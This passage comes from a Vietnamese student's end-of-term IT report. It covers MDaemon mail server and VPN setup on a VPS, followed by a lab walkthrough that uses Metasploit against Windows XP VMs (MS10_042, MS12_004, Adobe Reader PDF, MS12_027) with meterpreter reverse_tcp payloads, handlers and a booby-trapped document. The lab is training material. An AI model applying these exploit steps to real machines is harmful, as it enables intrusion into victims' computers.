cho các cá nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng
biệt, toàn quyền quản lý với Chi Phí Thấp.
Hình 3.2.1
Giao diện Remote Desktop Connection
Thông qua chương trình Remote Desktop Connection ta truy cập vào VPS đã
được thuê để tiến hành cấu hình, triển khai các dịch vụ như trên máy thật.
Hình 3.2.2
Giao diện ban đầu khi đăng nhập vào máy chủ VPS
Chúng ta tiến hành nhập User name và Password đã được cung cấp từ bên cho thuê để
truy cập vào.

-108-
Hình 3.2.3
Giao diện khi đã đăng nhập vào máy chủ VPS
b. Mail sever trên máy chủ ảo VPS
Hình 3.2.4
Đăng nhập máy chủ ảo VPS bằng công cụ Remote Desktop

-109-
Hình 3.2.5
Đăng nhập vào máy chủ ảo.
Hình 3.2.6
Dowload bộ cài đặt Mdeamon và chạy file Setup.exe
Hình 3.2.7
Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài
đặt.Bấm "Next" để tiếp tục.

-110-
Hình 3.1.92
Đánh dấu vào ô "I have read and I agree with all the terms of this license
agreement"
Hình 3.2.8
Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa
có cài hệ điều hành Microsoft Windows).

-111-
Hình 3.2.9
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới.
Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.
Hình 3.2.10
Tùy chọn các thông tim phù hợp với vị trí, ở đây là VietNam

-112-
Hình 3.2.11
Điền đúng thông tin về quy mô của tổ chức hoặc công ty.
Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.
Hình 3.2.12
Điền tên Domain

-113-
Hình 3.2.13
Điền địa chỉ DNS
Hình 3.2.14
Giữ nguyên lựa chọn "Setup MDaemon as a system service"

-114-
Hình 3.2.15
Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử
dụng
Hình 3.2.16
Giao diện sau khi cài đặt thành công.

-115-
Hình 3.2.17
Tạo 1 tài khoảng mới vào Account  New Account…
Hình 3.1.102
Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.

-116-
Hình 3.2.18
Vào OutLook Mail.
Hình 3.2.19
Gửi mail cho tài khoản yahoo.

-117-
Hình 3.2.20
Nhận Mail thành công
Hình 3.2.21
Tiến hành reply lai cho huynhuong@kutmujbl.tk

-118-
Hình 3.2.22
Nhận Mail thành công
Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.
c. Kết nối VPN thông qua máy chủ ảo VPS
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần phải
làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những người dùng
truy cập từ xa có thể được định danh và xác thực; các được hầm có thể được
tạo lập, duy trì và quản lý cho hàng trăm người dùng; việc định tuyến có thể
kiểm soát tất cả luồng lưu lượng qua Gateway, và trong khi tất các những thứ
này đang tiếp tục, hiệu suất và sự an toàn cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng ảo
hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các kết nối
mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần liên quan.
Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã thảo luận về kiểu

-119-
kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều Client truy cập tới một
cổng kết nối đơn vào các tài nguyên trong mạng Intranet. Trong phần này ta
sẽ mô tả các thành phần của các kết nối mạng riêng ảo truy cập từ xa và các
quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:
Hình 3.2.23 Mô hình VPN Client to site
Hình 3.2.24
Đăng nhập vào máy chủ ảo VPS với quyền quản trị.

-120-
Hình 3.2.25
Vào Start  Programs  Administrative Tools  Routing and remote access
để cấu hình.
Hình 3.2.26
Giao diện Routing and remote Access

-121-
Hình 3.2.27
Click chuột phải vào server bà chọn Configure and Enable Routing and
Remote Access.
Hình 3.2.28
Cửa sổ Routing and remote access server setup wizard hiện lên ta Click Next

-122-
Hình 3.2.29
Ta chọn Custom Configutation.
Hình 3.2.30
Đánh dấu vào 2 mục VPN access và mục Lan routing.Click Next.

-123-
Hình 3.2.31
Click Finish để tiến hành kích hoạt.
Hình 3.2.32
Click Yes để bắt đầu.

-124-
Hình 3.2.33
Routing and Remote Acces đã sẵn sàng.
Hình 3.2.34
Để cấu hình dãy địa chỉ IP khi các máy Client truy cập vào VPN sẽ được cấp ta right
click vào Server và chọn Properties.

-125-
Hình 3.2.35
Chuyễn sang tab IP và chọn Static andress pool.
Hình 3.2.36
Nhập dãy địa chỉ bắt đầu vào Start IP address và dãy địa chỉ kết thúc vvào End IP address
và Click OK để chấp nhận.

-126-
Hình 3.2.37
Như vậy chúng ta đã hoàn tất cấu hình cho phép có thể truy cập VPN vào máy chủ. Tiếp
theo ta cần tào tài khoảng để có thể đăng nhập vào máy chủ. Bằng cách Right click vào
My conputer và chọn Manage.
Hình 3.2.38
Tiếp theo ta vào System tools  Local Users and Groups  Users

-127-
Hình 3.2.39
Right Click vào User và chọn New User…

-128-
Hình 3.2.40
Tạo 1 user và điền tên user vào mục User name và mật khẩu vào ô Password và nhập lại
mật khẩu vào ô Confim password. Click Create để tạo user.
Tương tự ta tạo thêm một user 2 có tên là Client 2

-129-
Hình 3.2.41
Để User có quyền truy cập VPN ta right click vào tài khoảng cần cấp quyền và chọn
Properties
Hình 3.2.42
Sang tab Dial-in và chọn Allow Access để cấp quyền và click OK để hoàn tất. Tương tự
cho user có tên là Client2.

-130-
Hình 3.2.43
Chuẩn bị 2 máy ảo. Trên máy ảo thứ 1 ta vào Start Settings  Network Connections.
Hình 3.2.44
Click vào Create a new Connection

-131-
Hình 3.2.45
Hộp thoại New Connection Wizard hiện lên và click Next
Hình 3.2.46
Chọn mục Connect to the Network at my workplace và click Next

-132-
Hình 3.2.47
Click chọn Virual Private Network connection và chọn Next
Hình 3.2.48
Nhập tên công ty vào ô company name và click Next

-133-
Hình 3.2.49
Click Do not dial the intial connection và click Next
Hình 3.2.50
Nhập địa chỉ IP của máy chủ hoặc tên domain đã đăng ký và click Next

-134-
Hình 3.2.51
Chọn Anyone’s use và click Next
Hình 3.2.52
Chọn add a shortcut to this connection to my desktop để thuận tiện cho lần kết nối sau và
click Finish để hoàn tất.

-135-
Hình 3.2.53
Màn hình đăng nhập hiện lên ta nhập tên User và Password cần kết nối và click Connect.
Hình 3.2.54
Sau khi kết nối thành công thì bên góc phải màn hình sẽ có kết nối mạng thứ 2

-136-
Hình 3.2.55
Double click vào biểu tượng mạng kết nối  chuyển sang tab Details để xem chi tiết.
Hình 3.2.56
Các bước thực hiện tương tự cho Client 2. Và kết quả cho Client 2 như sau.
Trên Client1 tiến hành ping đến địa chỉ Clien2.
Và trên Client 2 ping đến địa chỉ Clien1.

-137-
Hình 3.2.59
Trên Clien1 tiến hành share 1 folder cho Clien 2. Bằng cách tạo 1 folder  right click
chọn properties  tab sharing  chọn Share this folder  click OK.
Hình 3.2.60
Trên Client 2 vào Start  run  gõ //địa chỉ client 2 và click OK.

-138-
Hình 3.2.59
Đã thấy được thư mục mà Client 1 đã share.
Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.

-139-
3.3. Bảo Mật Windows
a. Khai thác lỗ hổng trên Windows XP với mả lỗi MS10_042
Hình 3.3.1
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn
công nạn nhân)
Hình 3.3.2
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là:
192.168.1.5

-140-
Hình 3.3.3
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
Hình 3.3.4
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms10_042

-141-
Hình 3.3.5
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Hình 3.3.6
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.

-142-
Hình 3.3.7
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
Hình 3.3.8
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
Hình 3.3.9
Dùng lệnh set LHOST <ip backtrack>

-143-
Hình 3.3.10
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn
http://192.168.1.5:80/ nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Hình 3.3.11
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP
là 192.168.1.6

-144-
Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.1.5:80
Hình 3.3.12
Trên máy XP tự động xuất hiện hộp thoại Help and Support.
Hình 3.3.13
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
http://192.168.1.5:80/

-145-
Hình 3.3.14
Và nhận thấy có địa chỉ 192.168.1.6 kết nối vào. Và tạo phiên kết nối vào nó.
Hình 3.3.15
Trên máy back track ta gõ lệnh sessions để kiểm tra.
Hình 3.3.16
Dùng lệnh sessions –i 1
Hình 3.3.17
Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác
thành công lỗ hổng MS10_042 trên máy XP.

-146-
b. Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004
Hình 3.3.18
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn
công nạn nhân)
Hình 3.3.19
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.1.5

-147-
Hình 3.3.20
Hình 3.3.21

-148-
Hình 3.3.22
Hình 3.3.23

-149-
Hình 3.3.24
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack
Hình 3.3.25
Hình 3.3.26
Dùng lệnh set LHOST <ip backtrack

-150-
Hình 3.3.27
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.1.5:8080/
nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Hình 3.3.28
máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.1.6

-151-
Hình 3.3.29
Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.1.5:80/
Hình 3.3.30
Trên máy XP tự động xuất hiện hộp thoại yêu cầu chạy Windows Media Player. Nếu
chọn Run sẽ bị hack.

-152-
Hình 3.3.31
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
http://192.168.1.5:8080/
Hình 3.3.32
Và nhận thấy có địa chỉ 192.168.1.6 kết nối vào. Và tạo phiên kết nối vào nó.
Hình 3.3.33
Dùng lệnh sessions –i 1

-153-
Hình 3.3.34
Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành
công lỗ hổng MS12_004 trên máy XP.
c. Khai thác lỗ hổng trên Win XP với Adobe Reader 9.X
Hình 3.3.35
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy
tấn công nạn nhân)

-154-
Hình 3.3.36
192.168.1.5
Hình 3.3.37

-155-
Hình 3.3.38
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh user
exploit/windows/fileformat/adobe_pdf_embedded_exe
Hình 3.3.39
Hình 3.3.40
Dùng lệnh FILENAMETênFile
Hình 3.3.41
Dùng lệnh set INFILENAMEĐường_Dẫn_file_pdf_bất_kỳ.

-156-
Hình 3.3.42
Dùng lệnh set PAYLOAD windows/meterpreter/reverse_tcp để sử dụng mã
độc.
Hình 3.3.43
Dùng lệnh set LHOSTip_backtrack.
Hình 3.3.44
Dùng lệnh setLPORTport_tùy_ý_muốn_mở
Hình 3.3.45
Dùng lệnh exploit để tiến hành khai thác lỗi. .

-157-
Hình 3.3.46
Copy file đã tiêm mã độc ra Desktop.
Hình 3.3.47
Copy file có mã độc vào máy Windows XP bằng lệnh copy và past vào máy
XP.
Hình 3.3.47
Trên máy BackTrack sẽ lắn nghe kết nối bằng cách sử dụng lệnh user
exploit/multi/hander.
Hình 3.3.48
Sau đó set LHOTip_backtrack

-158-
Hình 3.3.49
Set LPORT như_khai_báo_port_trên.
Hình 3.3.50
Sau đó dùng lệnh exploit để lắng nghe.
Hình 3.3.51
Trên máy XP tiến hành đọc file có mã độc và xuất hiện hộp thoại. Nếu Click
Open sẽ bị hack.
Hình 3.3.52
Trên máy Back track gõ lệnh getuid để xem tên máy.

-159-
Hình 3.3.53
Gõ lệnh sysinfo để xem thông tin máy nạn nhân. Như vậy chúng ta đã hoàn
thành khai thác lỗi trên Adobe Reader 9.X
d. Khai thác lỗ hỏng trên Win XP với mã lỗi MS12_027
Hình 3.3.54
Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy
tấn công nạn nhân)

-160-
Hình 3.3.55
192.168.1.
Hình 3.3.56

-161-
Hình 3.3.57
Hình 3.3.58

-162-
Hình 3.3.59
Hình 3.3.60
Dùng lệnh setFILENAMEtên_file.
Hình 3.3.62

-163-
Hình 3.3.63
Dùng lệnh set LHOST <địa chỉ ip máy backtrack>
Hình 3.3.64
Dùng lệnh exploit để khai thác lỗi.
Hình 3.3.65
Copy file đã tiêm mã độc ra ngoài màng hình destop bằng lệnh cpđường_dẫn file
nguồnđường dẫn_fil_ đích

-164-
Hình 3.3.66
Dùng lệnh use/exploit/multi/handler
Hình 3.3.67
Dùng lệnh set PAYLOAD windows/meterpreter/reverse_tcp
Hình 3.3.68
Dùng lệnh set LHOST <ip backtrack>
Hình 3.3.69
Dùng lệnh set LHOSTip_back_track

-165-
Hình 3.3.70
Dùng lệnh exploit để bắt đầu lắng nghe.
Hình 3.3.71
Trên máy Back track copy file đã có mã độc ở ngoài desktop vào var/www để nạn nhân
dowload về.
Hình 3.3.72
Khởi động dịch vụ aphache trên Backtrack bằng lệnh /etc/init.d/apache2 start

-166-
Hình 3.3.73
Trên máy XP ta vào trình duyệt web để dowload file ta đã up trên máy back track bằng
cách gõ: 192.168.1.5/duy11145941.doc
Hình 3.3.74
Xuất hiện hộp thoại và nhấn Save để dowload
Hình 3.3.75
Khi máy XP mở file word có nhiễm mã độc thì sẽ bị hack.

-167-
Hình 3.3.76
Bênh máy Back track đã nhận thấy 1 kết nối và tạo phiên kết nối với nạn nhân.
Hình 3.3.77
Dùng lệnh sysinfo để kiểm tra. Như vậy ta đã hoàn thành khai thác lỗi MS12_027 trên
win XP.

-168-
4. Các Kết Quả Đạt Đƣợc
Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã có kiến
thức về:
Nguyên lý cơ bản của hệ điều hành mạ ứ ạng, có
kỹ năng cần thiết để cài đặ hình hoàn chỉnh mạng doanh nghiệp cỡ vừa và
lớn dựa vào Windows Server 2008.
Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạ ụ quả
ợ .
Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống
mạng.
Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
5. Kinh Nghiệm Thực Tế
Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của một
doanh nghiệp thông qua nền tảng.
Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ biết
đến thông qua sách vở.
Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học trên
lớp.
Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
6. Hoàn Thiện Bản Thân
Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ làm.
Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải
quyết vấn đề khó khăn gặp phải trong công việc.

Báo Cáo Cuối kỳ CNTT ATHENA

Báo Cáo Cuối kỳ CNTT ATHENA

Recommended

Recommended

More Related Content

What's hot

What's hot (17)

Viewers also liked

Viewers also liked (13)

Similar to Báo Cáo Cuối kỳ CNTT ATHENA

Similar to Báo Cáo Cuối kỳ CNTT ATHENA (20)

Báo Cáo Cuối kỳ CNTT ATHENA